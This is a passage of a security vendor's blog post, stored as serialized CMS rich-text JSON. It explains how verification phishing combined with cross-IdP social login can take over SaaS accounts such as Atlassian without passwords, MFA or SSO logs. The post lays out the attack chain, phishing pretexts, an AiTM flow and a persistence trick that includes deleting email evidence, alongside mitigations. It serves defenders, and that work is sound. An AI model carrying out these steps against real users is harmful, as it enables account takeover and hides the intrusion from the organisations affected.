type":194},{},{"nodeType":173,"value":213,"marks":180906,"data":180907},[],{},{"nodeType":178,"data":180909,"content":180910},{},[180911],{"nodeType":173,"value":220,"marks":180912,"data":180913},[],{},{"nodeType":178,"data":180915,"content":180916},{},[180917],{"nodeType":173,"value":227,"marks":180918,"data":180919},[],{},{"nodeType":231,"data":180921,"content":180922},{},[],{"nodeType":235,"data":180924,"content":180925},{},[180926],{"nodeType":173,"value":239,"marks":180927,"data":180928},[],{},{"nodeType":178,"data":180930,"content":180931},{},[180932],{"nodeType":173,"value":246,"marks":180933,"data":180934},[],{},{"nodeType":250,"data":180936,"content":180937},{},[180938,180947,180956,180965,180974],{"nodeType":254,"data":180939,"content":180940},{},[180941],{"nodeType":178,"data":180942,"content":180943},{},[180944],{"nodeType":173,"value":261,"marks":180945,"data":180946},[],{},{"nodeType":254,"data":180948,"content":180949},{},[180950],{"nodeType":178,"data":180951,"content":180952},{},[180953],{"nodeType":173,"value":271,"marks":180954,"data":180955},[],{},{"nodeType":254,"data":180957,"content":180958},{},[180959],{"nodeType":178,"data":180960,"content":180961},{},[180962],{"nodeType":173,"value":281,"marks":180963,"data":180964},[],{},{"nodeType":254,"data":180966,"content":180967},{},[180968],{"nodeType":178,"data":180969,"content":180970},{},[180971],{"nodeType":173,"value":291,"marks":180972,"data":180973},[],{},{"nodeType":254,"data":180975,"content":180976},{},[180977],{"nodeType":178,"data":180978,"content":180979},{},[180980],{"nodeType":173,"value":301,"marks":180981,"data":180982},[],{},{"nodeType":178,"data":180984,"content":180985},{},[180986],{"nodeType":173,"value":308,"marks":180987,"data":180988},[],{},{"nodeType":312,"data":180990,"content":180993},{"target":180991},{"sys":180992},{"id":316,"type":317,"linkType":318},[],{"nodeType":231,"data":180995,"content":180996},{},[],{"nodeType":235,"data":180998,"content":180999},{},[181000],{"nodeType":173,"value":327,"marks":181001,"data":181002},[],{},{"nodeType":178,"data":181004,"content":181005},{},[181006],{"nodeType":173,"value":334,"marks":181007,"data":181008},[],{},{"nodeType":178,"data":181010,"content":181011},{},[181012],{"nodeType":173,"value":341,"marks":181013,"data":181014},[],{},{"nodeType":178,"data":181016,"content":181017},{},[181018],{"nodeType":173,"value":348,"marks":181019,"data":181020},[],{},{"nodeType":178,"data":181022,"content":181023},{},[181024],{"nodeType":173,"value":355,"marks":181025,"data":181026},[],{},{"nodeType":235,"data":181028,"content":181029},{},[181030,181033,181038],{"nodeType":173,"value":362,"marks":181031,"data":181032},[],{},{"nodeType":173,"value":366,"marks":181034,"data":181037},[181035,181036],{"type":194},{"type":370},{},{"nodeType":173,"value":373,"marks":181039,"data":181040},[],{},{"nodeType":312,"data":181042,"content":181045},{"target":181043},{"sys":181044},{"id":380,"type":317,"linkType":318},[],{"nodeType":178,"data":181047,"content":181048},{},[181049],{"nodeType":173,"value":386,"marks":181050,"data":181051},[],{},{"nodeType":178,"data":181053,"content":181054},{},[181055],{"nodeType":173,"value":393,"marks":181056,"data":181057},[],{},{"nodeType":235,"data":181059,"content":181060},{},[181061,181064,181069],{"nodeType":173,"value":400,"marks":181062,"data":181063},[],{},{"nodeType":173,"value":404,"marks":181065,"data":181068},[181066,181067],{"type":194},{"type":370},{},{"nodeType":173,"value":410,"marks":181070,"data":181071},[],{},{"nodeType":312,"data":181073,"content":181076},{"target":181074},{"sys":181075},{"id":417,"type":317,"linkType":318},[],{"nodeType":178,"data":181078,"content":181079},{},[181080],{"nodeType":173,"value":423,"marks":181081,"data":181082},[],{},{"nodeType":178,"data":181084,"content":181085},{},[181086],{"nodeType":173,"value":430,"marks":181087,"data":181088},[],{},{"nodeType":178,"data":181090,"content":181091},{},[181092],{"nodeType":173,"value":437,"marks":181093,"data":181094},[],{},{"nodeType":178,"data":181096,"content":181097},{},[181098],{"nodeType":173,"value":444,"marks":181099,"data":181100},[],{},{"nodeType":178,"data":181102,"content":181103},{},[181104],{"nodeType":173,"value":451,"marks":181105,"data":181106},[],{},{"nodeType":231,"data":181108,"content":181109},{},[],{"nodeType":169,"data":181111,"content":181112},{},[181113],{"nodeType":173,"value":461,"marks":181114,"data":181115},[],{},{"nodeType":178,"data":181117,"content":181118},{},[181119,181122,181129],{"nodeType":173,"value":468,"marks":181120,"data":181121},[],{},{"nodeType":186,"data":181123,"content":181124},{"uri":473},[181125],{"nodeType":173,"value":476,"marks":181126,"data":181128},[181127],{"type":194},{},{"nodeType":173,"value":481,"marks":181130,"data":181131},[],{},{"nodeType":312,"data":181133,"content":181136},{"target":181134},{"sys":181135},{"id":488,"type":317,"linkType":318},[],{"nodeType":178,"data":181138,"content":181139},{},[181140],{"nodeType":173,"value":37,"marks":181141,"data":181142},[],{},{"items":181144},[181145,181147],{"sys":181146,"name":505},{"id":504},{"sys":181148,"name":509},{"id":508},{"items":181150},[181151],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":181152},{"url":516},{"items":181154},[181155],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":181156},{"url":8615},{"json":181158,"links":182442},{"nodeType":165,"data":181159,"content":181160},{},[181161,181168,181175,181208,181215,181222,181225,181232,181249,181269,181276,181282,181300,181307,181331,181334,181341,181348,181355,181362,181369,181375,181393,181400,181403,181410,181417,181424,181431,181438,181486,181489,181495,181502,181508,181511,181517,181548,181568,181575,181581,181584,181591,181609,181629,181636,181689,181695,181698,181705,181712,181719,181794,181797,181804,181811,181818,181823,181826,181833,181852,181870,181886,181893,181896,181903,181910,181917,181924,181927,181934,181941,181948,181955,181958,181965,181972,181979,181985,181991,181994,182001,182008,182015,182021,182024,182031,182038,182045,182051,182054,182061,182068,182075,182081,182087,182094,182113,182120,182126,182133,182136,182143,182150,182157,182164,182167,182174,182181,182186,182189,182196,182203,182210,182242,182245,182252,182259,182277,182284,182291,182298,182304,182307,182314,182321,182340,182343,182349,182356,182409,182416,182423,182430,182436],{"nodeType":178,"data":181162,"content":181163},{},[181164],{"nodeType":173,"value":181165,"marks":181166,"data":181167},"Many organizations make use of a centralized managed identity provider (IdP) that they use as an SSO gateway, such as Microsoft Entra, Okta, Google Workspace etc. ",[],{},{"nodeType":178,"data":181169,"content":181170},{},[181171],{"nodeType":173,"value":181172,"marks":181173,"data":181174},"In a perfect world, every account, on every business application, would be:",[],{},{"nodeType":250,"data":181176,"content":181177},{},[181178,181188,181198],{"nodeType":254,"data":181179,"content":181180},{},[181181],{"nodeType":178,"data":181182,"content":181183},{},[181184],{"nodeType":173,"value":181185,"marks":181186,"data":181187},"Accessed via SSO from an IdP account via SAML or OIDC protocols.",[],{},{"nodeType":254,"data":181189,"content":181190},{},[181191],{"nodeType":178,"data":181192,"content":181193},{},[181194],{"nodeType":173,"value":181195,"marks":181196,"data":181197},"Protected by strong authentication controls such as phishing-resistant factors such as passkeys or Okta Fastpass.",[],{},{"nodeType":254,"data":181199,"content":181200},{},[181201],{"nodeType":178,"data":181202,"content":181203},{},[181204],{"nodeType":173,"value":181205,"marks":181206,"data":181207},"Configured to provide strong centralized audit logging. ",[],{},{"nodeType":178,"data":181209,"content":181210},{},[181211],{"nodeType":173,"value":181212,"marks":181213,"data":181214},"This would in theory provide broad protection against identity attacks — there are no credentials to steal or be phished (even using modern AiTM phish kits) and the logging would provide threat hunting and incident response teams with a great data source for detection and response. ",[],{},{"nodeType":178,"data":181216,"content":181217},{},[181218],{"nodeType":173,"value":181219,"marks":181220,"data":181221},"But what if it were possible to compromise downstream SaaS applications directly and circumvent every single control we just outlined? No password needed, no MFA needed, no SSO audit logs — and all it took was the ability to phish a verification code from a target user. This is what is often possible using verification phishing when combined with cross-IdP impersonation. ",[],{},{"nodeType":231,"data":181223,"content":181224},{},[],{"nodeType":169,"data":181226,"content":181227},{},[181228],{"nodeType":173,"value":181229,"marks":181230,"data":181231},"What is cross-IdP impersonation?",[],{},{"nodeType":178,"data":181233,"content":181234},{},[181235,181238,181245],{"nodeType":173,"value":37,"marks":181236,"data":181237},[],{},{"nodeType":186,"data":181239,"content":181240},{"uri":61697},[181241],{"nodeType":173,"value":57951,"marks":181242,"data":181244},[181243],{"type":194},{},{"nodeType":173,"value":181246,"marks":181247,"data":181248}," is when you authenticate to an application as a user but using a different IdP from the one used ordinarily by the target organization. Depending on the configuration of the target application, this can potentially allow very strict authentication controls to be either partially or completely circumvented. ",[],{},{"nodeType":178,"data":181250,"content":181251},{},[181252,181256,181265],{"nodeType":173,"value":181253,"marks":181254,"data":181255},"Let’s look at an example. Say an organization uses Microsoft Entra as their primary IdP. Their users have email addresses of ",[],{},{"nodeType":186,"data":181257,"content":181259},{"uri":181258},"mailto:user@example.com",[181260],{"nodeType":173,"value":181261,"marks":181262,"data":181264},"user@example.com",[181263],{"type":194},{},{"nodeType":173,"value":181266,"marks":181267,"data":181268},", they authenticate using strong MFA to Microsoft and then either SAML or OIDC login to their downstream applications. ",[],{},{"nodeType":178,"data":181270,"content":181271},{},[181272],{"nodeType":173,"value":181273,"marks":181274,"data":181275},"However, some of their downstream applications support many different login methods to support different customers, as is extremely common for SaaS vendors. Let’s say they are using the Atlassian suite of products, which support many different login methods as shown below:",[],{},{"nodeType":312,"data":181277,"content":181281},{"target":181278},{"sys":181279},{"id":181280,"type":317,"linkType":318},"5tV8ypsY7V1P5VpVOeJXUO",[],{"nodeType":178,"data":181283,"content":181284},{},[181285,181289,181296],{"nodeType":173,"value":181286,"marks":181287,"data":181288},"The legitimate user normally clicks the Microsoft button to perform an OIDC social login. However, what happens if an attacker somehow gains access to an account with a different IdP using the target user’s email address? So they somehow gain access to ",[],{},{"nodeType":186,"data":181290,"content":181291},{"uri":181258},[181292],{"nodeType":173,"value":181261,"marks":181293,"data":181295},[181294],{"type":194},{},{"nodeType":173,"value":181297,"marks":181298,"data":181299}," as an account for Apple or Google. Then, in the default configuration of Atlassian, they can click the Apple or Google buttons and login directly to the downstream application without ever touching the organization’s secure Microsoft Entra tenant.",[],{},{"nodeType":178,"data":181301,"content":181302},{},[181303],{"nodeType":173,"value":181304,"marks":181305,"data":181306},"But how would an attacker gain access to an Apple or Google account anyway? Wouldn’t they have to authenticate using Microsoft to login to those services and so it becomes a circular problem? Well actually, no. In many cases, an organization won’t have accounts with other major IdPs and so those accounts don’t actually exist. ",[],{},{"nodeType":178,"data":181308,"content":181309},{},[181310,181314,181318,181322,181327],{"nodeType":173,"value":181311,"marks":181312,"data":181313},"So rather than take over ",[],{},{"nodeType":173,"value":179447,"marks":181315,"data":181317},[181316],{"type":194},{},{"nodeType":173,"value":181319,"marks":181320,"data":181321}," accounts, what if an attacker could somehow ",[],{},{"nodeType":173,"value":181323,"marks":181324,"data":181326},"create",[181325],{"type":194},{},{"nodeType":173,"value":181328,"marks":181329,"data":181330}," a new one?",[],{},{"nodeType":231,"data":181332,"content":181333},{},[],{"nodeType":169,"data":181335,"content":181336},{},[181337],{"nodeType":173,"value":181338,"marks":181339,"data":181340},"What is verification phishing?",[],{},{"nodeType":178,"data":181342,"content":181343},{},[181344],{"nodeType":173,"value":181345,"marks":181346,"data":181347},"The primary concern for most organizations is preventing attackers from gaining access to core business applications and data and, consequently, the identities that allow access to those applications and data — therefore, protecting IdP accounts used for SSO is a Tier-1 priority. ",[],{},{"nodeType":178,"data":181349,"content":181350},{},[181351],{"nodeType":173,"value":181352,"marks":181353,"data":181354},"However, preventing accounts being created on other applications they do not use, and therefore do not contain company data, is not a direct concern — unless legitimate users start using those applications and entering company data. This is normally only considered in the context of a shadow SaaS problem — an important, but very different, security issue.",[],{},{"nodeType":178,"data":181356,"content":181357},{},[181358],{"nodeType":173,"value":181359,"marks":181360,"data":181361},"For SaaS vendors though, unwanted and unverified signups can be a painful issue as they are often associated with spam or general misuse of their platforms. Therefore, it’s very common (but not universal) for SaaS vendors to require some basic verification steps for new accounts to raise the bar and prevent common abuse patterns — most commonly, this involves sending an email to the given email address to require either a link to be clicked or to supply a verification code to be used to verify the address. ",[],{},{"nodeType":178,"data":181363,"content":181364},{},[181365],{"nodeType":173,"value":181366,"marks":181367,"data":181368},"For example, here’s what Google sends when creating a new Google account attached to an existing email address:",[],{},{"nodeType":312,"data":181370,"content":181374},{"target":181371},{"sys":181372},{"id":181373,"type":317,"linkType":318},"4Smkx9soF6ob3W1BZaqy3P",[],{"nodeType":178,"data":181376,"content":181377},{},[181378,181382,181389],{"nodeType":173,"value":181379,"marks":181380,"data":181381},"So let’s say an attacker wants to register a new account as ",[],{},{"nodeType":186,"data":181383,"content":181384},{"uri":181258},[181385],{"nodeType":173,"value":181261,"marks":181386,"data":181388},[181387],{"type":194},{},{"nodeType":173,"value":181390,"marks":181391,"data":181392}," with an application that is not used by the target user (or even the target organization). What would they need to do? Well in many cases, they can create the account, set the password and any other details like MFA or phone number directly — all they need to do is convince the user to click the link in the verification email or supply the verification code included.",[],{},{"nodeType":178,"data":181394,"content":181395},{},[181396],{"nodeType":173,"value":181397,"marks":181398,"data":181399},"So that’s what verification phishing is: Using phishing, or some other form of social engineering, to convince a target user to verify an account. But how difficult is that? Well, actually, not very!",[],{},{"nodeType":231,"data":181401,"content":181402},{},[],{"nodeType":169,"data":181404,"content":181405},{},[181406],{"nodeType":173,"value":181407,"marks":181408,"data":181409},"Verification phishing scenarios",[],{},{"nodeType":178,"data":181411,"content":181412},{},[181413],{"nodeType":173,"value":181414,"marks":181415,"data":181416},"No matter how hard we try to stop phishing with user awareness training and phishing simulations, phishing still succeeds to some extent.",[],{},{"nodeType":178,"data":181418,"content":181419},{},[181420],{"nodeType":173,"value":181421,"marks":181422,"data":181423},"Typically, we train users to be suspicious of clicking links in emails, to check the domains of any links carefully and to be especially careful when prompted for entering a password for an account they use.",[],{},{"nodeType":178,"data":181425,"content":181426},{},[181427],{"nodeType":173,"value":181428,"marks":181429,"data":181430},"But what are we asking our target users to do with verification phishing? Simply asking them to click a link, or supply a verification code, in an email from a legitimate address for an account they know does not exist — so from their perspective, what are they giving away? What’s the risk, really?",[],{},{"nodeType":178,"data":181432,"content":181433},{},[181434],{"nodeType":173,"value":181435,"marks":181436,"data":181437},"With a bit of clever thought behind the social engineering effort, we should see much higher success rates with verification phishing than with conventional password phishing. Let’s consider a few strategies that could be used, with differing sophistication levels:",[],{},{"nodeType":250,"data":181439,"content":181440},{},[181441,181456,181471],{"nodeType":254,"data":181442,"content":181443},{},[181444],{"nodeType":178,"data":181445,"content":181446},{},[181447,181452],{"nodeType":173,"value":181448,"marks":181449,"data":181451},"Pretext emails",[181450],{"type":370},{},{"nodeType":173,"value":181453,"marks":181454,"data":181455}," – a classic and simple email approach",[],{},{"nodeType":254,"data":181457,"content":181458},{},[181459],{"nodeType":178,"data":181460,"content":181461},{},[181462,181467],{"nodeType":173,"value":181463,"marks":181464,"data":181466},"IM phishing",[181465],{"type":370},{},{"nodeType":173,"value":181468,"marks":181469,"data":181470}," – hands-on-keyboard social engineering effort but using IM",[],{},{"nodeType":254,"data":181472,"content":181473},{},[181474],{"nodeType":178,"data":181475,"content":181476},{},[181477,181482],{"nodeType":173,"value":181478,"marks":181479,"data":181481},"AiTM verification phishing",[181480],{"type":370},{},{"nodeType":173,"value":181483,"marks":181484,"data":181485}," – a technically sophisticated approach requiring new tooling",[],{},{"nodeType":231,"data":181487,"content":181488},{},[],{"nodeType":235,"data":181490,"content":181491},{},[181492],{"nodeType":173,"value":181448,"marks":181493,"data":181494},[],{},{"nodeType":178,"data":181496,"content":181497},{},[181498],{"nodeType":173,"value":181499,"marks":181500,"data":181501},"We could create a false pretext by emailing users ahead of time to be expecting the verification email and take advantage of the fact the incoming verification email will be from a legitimate address to create an additional sense of trust. We’ll use Google as an example in this case.",[],{},{"nodeType":312,"data":181503,"content":181507},{"target":181504},{"sys":181505},{"id":181506,"type":317,"linkType":318},"4YQzNZOxyg7zGxCReAJonK",[],{"nodeType":231,"data":181509,"content":181510},{},[],{"nodeType":235,"data":181512,"content":181513},{},[181514],{"nodeType":173,"value":181463,"marks":181515,"data":181516},[],{},{"nodeType":178,"data":181518,"content":181519},{},[181520,181524,181533,181536,181545],{"nodeType":173,"value":181521,"marks":181522,"data":181523},"IM phishing is a great way to conduct modern phishing attacks as users generally have more trust in IM platforms than email. Since the advent of Slack Connect and Teams external access, this has been possible as an external initial access vector too. If you’re interested in this technique in general, check out our previous posts on ",[],{},{"nodeType":186,"data":181525,"content":181527},{"uri":181526},"https://pushsecurity.com/blog/slack-phishing-for-initial-access/",[181528],{"nodeType":173,"value":181529,"marks":181530,"data":181532},"Slack phishing",[181531],{"type":194},{},{"nodeType":173,"value":933,"marks":181534,"data":181535},[],{},{"nodeType":186,"data":181537,"content":181539},{"uri":181538},"https://pushsecurity.com/blog/phishing-microsoft-teams-for-initial-access/",[181540],{"nodeType":173,"value":181541,"marks":181542,"data":181544},"Teams phishing",[181543],{"type":194},{},{"nodeType":173,"value":1477,"marks":181546,"data":181547},[],{},{"nodeType":178,"data":181549,"content":181550},{},[181551,181555,181564],{"nodeType":173,"value":181552,"marks":181553,"data":181554},"It also has the advantage that the instant nature of it makes it great for building a social engineering pretext. This is more of a classic interactive social engineering effort over a new delivery vector (IM), than a single message or link-based phishing attack, and so is a more targeted attack strategy. It’s not too dissimilar from ",[],{},{"nodeType":186,"data":181556,"content":181558},{"uri":181557},"https://www.microsoft.com/en-us/security/blog/2023/10/25/octo-tempest-crosses-boundaries-to-facilitate-extortion-encryption-and-destruction/",[181559],{"nodeType":173,"value":181560,"marks":181561,"data":181563},"strategies used by Scattered Spider to social engineer their way past MFA controls",[181562],{"type":194},{},{"nodeType":173,"value":181565,"marks":181566,"data":181567},", except they generally used phone and SMS delivery vectors. ",[],{},{"nodeType":178,"data":181569,"content":181570},{},[181571],{"nodeType":173,"value":181572,"marks":181573,"data":181574},"Consider the following exchange, and ask yourself how many users could fall for this strategy. I’ll play the victim myself this time and we’ll use Apple as an example.",[],{},{"nodeType":312,"data":181576,"content":181580},{"target":181577},{"sys":181578},{"id":181579,"type":317,"linkType":318},"11A6zC4ZA6NRorrC5UCqUE",[],{"nodeType":231,"data":181582,"content":181583},{},[],{"nodeType":235,"data":181585,"content":181586},{},[181587],{"nodeType":173,"value":181588,"marks":181589,"data":181590},"AiTM verification phishing ",[],{},{"nodeType":178,"data":181592,"content":181593},{},[181594,181597,181605],{"nodeType":173,"value":37,"marks":181595,"data":181596},[],{},{"nodeType":186,"data":181598,"content":181599},{"uri":49844},[181600],{"nodeType":173,"value":181601,"marks":181602,"data":181604},"AiTM phishing",[181603],{"type":194},{},{"nodeType":173,"value":181606,"marks":181607,"data":181608}," to bypass common SSO and MFA protections is now a commonly used technique by attackers, with a range of open-source and criminal tools implementing this in the wild. However, there is nothing stopping a similar approach being used to make verification phishing much more effective and scalable than it is currently. ",[],{},{"nodeType":178,"data":181610,"content":181611},{},[181612,181616,181625],{"nodeType":173,"value":181613,"marks":181614,"data":181615},"If current AiTM tooling, such as the popular AiTM tool ",[],{},{"nodeType":186,"data":181617,"content":181619},{"uri":181618},"https://github.com/kgretzky/evilginx2",[181620],{"nodeType":173,"value":181621,"marks":181622,"data":181624},"Evilginx",[181623],{"type":194},{},{"nodeType":173,"value":181626,"marks":181627,"data":181628},", evolves to integrate this capability then it is likely to be by far the most effective verification phishing technique.",[],{},{"nodeType":178,"data":181630,"content":181631},{},[181632],{"nodeType":173,"value":181633,"marks":181634,"data":181635},"Consider the IM phishing example with Slack given above turned into an interactive website.  We would probably see the following steps occur:",[],{},{"nodeType":250,"data":181637,"content":181638},{},[181639,181649,181659,181669,181679],{"nodeType":254,"data":181640,"content":181641},{},[181642],{"nodeType":178,"data":181643,"content":181644},{},[181645],{"nodeType":173,"value":181646,"marks":181647,"data":181648},"Phishing email sent with a link asking the user to register if they would like to take part in the Apple device trial",[],{},{"nodeType":254,"data":181650,"content":181651},{},[181652],{"nodeType":178,"data":181653,"content":181654},{},[181655],{"nodeType":173,"value":181656,"marks":181657,"data":181658},"User clicks link and is taken to a custom phishing website that informs them they will need to verify their email for an Apple account to be provisioned for their new device",[],{},{"nodeType":254,"data":181660,"content":181661},{},[181662],{"nodeType":178,"data":181663,"content":181664},{},[181665],{"nodeType":173,"value":181666,"marks":181667,"data":181668},"User clicks a verification button and the AiTM tool automatically registers a new Apple account and prompts for the verification code",[],{},{"nodeType":254,"data":181670,"content":181671},{},[181672],{"nodeType":178,"data":181673,"content":181674},{},[181675],{"nodeType":173,"value":181676,"marks":181677,"data":181678},"The target user sees the verification email from Apple arrive in their inbox and copies the code into the phishing website",[],{},{"nodeType":254,"data":181680,"content":181681},{},[181682],{"nodeType":178,"data":181683,"content":181684},{},[181685],{"nodeType":173,"value":181686,"marks":181687,"data":181688},"The AiTM tool verifies the Apple account using the supplied code and the attack is complete",[],{},{"nodeType":312,"data":181690,"content":181694},{"target":181691},{"sys":181692},{"id":181693,"type":317,"linkType":318},"5JP8lyDNKJf3P3XcbI83Bw",[],{"nodeType":231,"data":181696,"content":181697},{},[],{"nodeType":169,"data":181699,"content":181700},{},[181701],{"nodeType":173,"value":181702,"marks":181703,"data":181704},"Putting it all together (with demo)",[],{},{"nodeType":178,"data":181706,"content":181707},{},[181708],{"nodeType":173,"value":181709,"marks":181710,"data":181711},"Now that we’re familiar with cross-IdP impersonation and verification phishing, let’s consider what a full attack chain looks like and what the impact is. ",[],{},{"nodeType":178,"data":181713,"content":181714},{},[181715],{"nodeType":173,"value":181716,"marks":181717,"data":181718},"In doing so, we’ll consider an organization that uses Microsoft Entra as their SSO with strong phishing-resistant MFA and logging and an example downstream SaaS app being Atlassian, which is accessed using a Microsoft social login for SSO. ",[],{},{"nodeType":250,"data":181720,"content":181721},{},[181722,181743,181753,181763,181784],{"nodeType":254,"data":181723,"content":181724},{},[181725],{"nodeType":178,"data":181726,"content":181727},{},[181728,181732,181739],{"nodeType":173,"value":181729,"marks":181730,"data":181731},"Attacker registers for an IdP account, such as an Apple account with ",[],{},{"nodeType":186,"data":181733,"content":181734},{"uri":181258},[181735],{"nodeType":173,"value":181261,"marks":181736,"data":181738},[181737],{"type":194},{},{"nodeType":173,"value":181740,"marks":181741,"data":181742}," and sets a password",[],{},{"nodeType":254,"data":181744,"content":181745},{},[181746],{"nodeType":178,"data":181747,"content":181748},{},[181749],{"nodeType":173,"value":181750,"marks":181751,"data":181752},"Attacker begins the verification phishing process and convinces a user to supply the verification code",[],{},{"nodeType":254,"data":181754,"content":181755},{},[181756],{"nodeType":178,"data":181757,"content":181758},{},[181759],{"nodeType":173,"value":181760,"marks":181761,"data":181762},"Attacker verifies their newly created Apple account using the verification code",[],{},{"nodeType":254,"data":181764,"content":181765},{},[181766],{"nodeType":178,"data":181767,"content":181768},{},[181769,181773,181780],{"nodeType":173,"value":181770,"marks":181771,"data":181772},"Attacker logs in to Atlassian using “Login with Apple” as ",[],{},{"nodeType":186,"data":181774,"content":181775},{"uri":181258},[181776],{"nodeType":173,"value":181261,"marks":181777,"data":181779},[181778],{"type":194},{},{"nodeType":173,"value":181781,"marks":181782,"data":181783},", without having to know the user’s password or MFA factors",[],{},{"nodeType":254,"data":181785,"content":181786},{},[181787],{"nodeType":178,"data":181788,"content":181789},{},[181790],{"nodeType":173,"value":181791,"marks":181792,"data":181793},"There are no logs generated in Microsoft to show an SSO login to Atlassian was made as it happened via the attacker’s Apple account – the only logs would be within Atlassian itself",[],{},{"nodeType":231,"data":181795,"content":181796},{},[],{"nodeType":235,"data":181798,"content":181799},{},[181800],{"nodeType":173,"value":181801,"marks":181802,"data":181803},"Cross-IdP impersonation attack demo",[],{},{"nodeType":178,"data":181805,"content":181806},{},[181807],{"nodeType":173,"value":181808,"marks":181809,"data":181810},"At this point, there’s no better way to demonstrate the attack than to show it. The following narrated video shows cross-idp impersonation in action to compromise an Atlassian account that is normally accessed using a Microsoft Entra account for SSO that is strongly protected with passkeys. ",[],{},{"nodeType":178,"data":181812,"content":181813},{},[181814],{"nodeType":173,"value":181815,"marks":181816,"data":181817},"For the purposes of this demo, we assume some form of successful verification phishing is performed and focus on demonstrating the cross-IdP impersonation aspect.",[],{},{"nodeType":312,"data":181819,"content":181822},{"target":181820},{"sys":181821},{"id":180138,"type":317,"linkType":318},[],{"nodeType":231,"data":181824,"content":181825},{},[],{"nodeType":169,"data":181827,"content":181828},{},[181829],{"nodeType":173,"value":181830,"marks":181831,"data":181832},"It doesn't stop there: cross-IdP impersonation for persistence",[],{},{"nodeType":178,"data":181834,"content":181835},{},[181836,181840,181848],{"nodeType":173,"value":181837,"marks":181838,"data":181839},"The problems with cross-IdP impersonation don’t stop at the initial access layer. Consider an attacker who has gained temporary control of an SSO user account, or email inbox, through some other means and is looking to maintain access. Perhaps they have used an ",[],{},{"nodeType":186,"data":181841,"content":181842},{"uri":49844},[181843],{"nodeType":173,"value":181844,"marks":181845,"data":181847},"AiTM phishing attack",[181846],{"type":194},{},{"nodeType":173,"value":181849,"marks":181850,"data":181851}," to compromise the user’s core SSO identity. ",[],{},{"nodeType":178,"data":181853,"content":181854},{},[181855,181859,181866],{"nodeType":173,"value":181856,"marks":181857,"data":181858},"A common method for achieving this is to create ",[],{},{"nodeType":186,"data":181860,"content":181861},{"uri":832},[181862],{"nodeType":173,"value":835,"marks":181863,"data":181865},[181864],{"type":194},{},{"nodeType":173,"value":181867,"marks":181868,"data":181869}," on downstream SaaS applications. This depends on what each application supports but it can involve connecting secondary email addresses, connecting separate social accounts, creating API keys or any method that allows a different way to authenticate to the application. These allow the attacker to maintain their access to those applications even if their access to the core SSO identity for the user is revoked. The downside is that it has to be performed on a per-application basis.",[],{},{"nodeType":178,"data":181871,"content":181872},{},[181873,181877,181882],{"nodeType":173,"value":181874,"marks":181875,"data":181876},"However, ",[],{},{"nodeType":173,"value":181878,"marks":181879,"data":181881},"cross-IdP impersonation is arguably the most powerful ghost login method available",[181880],{"type":370},{},{"nodeType":173,"value":181883,"marks":181884,"data":181885},". If you already have access to a user’s email inbox through another attack then there is no need to perform verification phishing. Simply register an account with Google/Apple/LinkedIn/X/GitHub or any other major IdP using the email address you have control over, verifying the accounts, and then deleting the email evidence.",[],{},{"nodeType":178,"data":181887,"content":181888},{},[181889],{"nodeType":173,"value":181890,"marks":181891,"data":181892},"An attacker who does this will then maintain the ability to login to any downstream SaaS applications that support any of those login methods without additional verification steps — even if original SSO/email compromise efforts are discovered and contained. In effect, a single persistence technique could potentially maintain access to a range of different downstream applications. ",[],{},{"nodeType":231,"data":181894,"content":181895},{},[],{"nodeType":169,"data":181897,"content":181898},{},[181899],{"nodeType":173,"value":181900,"marks":181901,"data":181902},"Why (and when) is this attack possible?",[],{},{"nodeType":178,"data":181904,"content":181905},{},[181906],{"nodeType":173,"value":181907,"marks":181908,"data":181909},"Most SaaS applications support a range of different authentication methods to provide flexibility for the wide range of customers they have and generally make it as simple to sign up as possible — a consequence of product-led growth marketing strategies.",[],{},{"nodeType":178,"data":181911,"content":181912},{},[181913],{"nodeType":173,"value":181914,"marks":181915,"data":181916},"Using more secure, locked-down authentication methods is often left as a task for the administrators of a given customer’s tenant. However, when hundreds of SaaS apps are in use, this doesn’t always happen — maybe the app was self-adopted by a specific team and the security team doesn’t know about it, or they simply haven’t gotten around to it. ",[],{},{"nodeType":178,"data":181918,"content":181919},{},[181920],{"nodeType":173,"value":181921,"marks":181922,"data":181923},"There are far too many applications out there to provide an exhaustive list of what configurations and behaviors are available. Instead, I’ll provide some examples of the different types of controls/configuration you may encounter that can help or hinder this attack technique.",[],{},{"nodeType":231,"data":181925,"content":181926},{},[],{"nodeType":235,"data":181928,"content":181929},{},[181930],{"nodeType":173,"value":181931,"marks":181932,"data":181933},"1) Default allow",[],{},{"nodeType":178,"data":181935,"content":181936},{},[181937],{"nodeType":173,"value":181938,"marks":181939,"data":181940},"This is the primary vulnerable case like we have seen with the Atlassian example in this article. Once you have created an account on an application then all other sign-in methods are available by default, making it a prime target for cross-IdP impersonation. ",[],{},{"nodeType":178,"data":181942,"content":181943},{},[181944],{"nodeType":173,"value":181945,"marks":181946,"data":181947},"An important caveat here is this is not a case of Atlassian being uniquely vulnerable. This is a widespread issue with many SaaS apps behaving this way by default. We just used Atlassian as an example because it’s a particularly popular app. ",[],{},{"nodeType":178,"data":181949,"content":181950},{},[181951],{"nodeType":173,"value":181952,"marks":181953,"data":181954},"This also doesn’t mean you have to accept this limitation. It’s often possible to disable other methods, but it requires that app administrators proactively take that step. For example, Atlassian allows third-party logins to be disabled entirely, and more advanced control of authentication options is possible using the Atlassian Guard product too. (See the section on configurable controls, below.)",[],{},{"nodeType":231,"data":181956,"content":181957},{},[],{"nodeType":235,"data":181959,"content":181960},{},[181961],{"nodeType":173,"value":181962,"marks":181963,"data":181964},"2) Email verification",[],{},{"nodeType":178,"data":181966,"content":181967},{},[181968],{"nodeType":173,"value":181969,"marks":181970,"data":181971},"Some applications will require their own email verification when a new login method is used. This does not completely prevent the issue, as it’s possible to perform verification phishing of this too, but it’s definitely a mitigating factor that makes an attacker’s life more difficult.",[],{},{"nodeType":178,"data":181973,"content":181974},{},[181975],{"nodeType":173,"value":181976,"marks":181977,"data":181978},"The following screenshots show how this works for Adobe as an example. When logging in with a Google account in this case, it prompts for a verification code from email in order to connect the Google account to the pre-existing Adobe account.",[],{},{"nodeType":312,"data":181980,"content":181984},{"target":181981},{"sys":181982},{"id":181983,"type":317,"linkType":318},"92VAmeVKmQ3FWSwSP3mHv",[],{"nodeType":312,"data":181986,"content":181990},{"target":181987},{"sys":181988},{"id":181989,"type":317,"linkType":318},"6UqNnTdjZxisCUA7Q2gZWQ",[],{"nodeType":231,"data":181992,"content":181993},{},[],{"nodeType":235,"data":181995,"content":181996},{},[181997],{"nodeType":173,"value":181998,"marks":181999,"data":182000},"3) Device 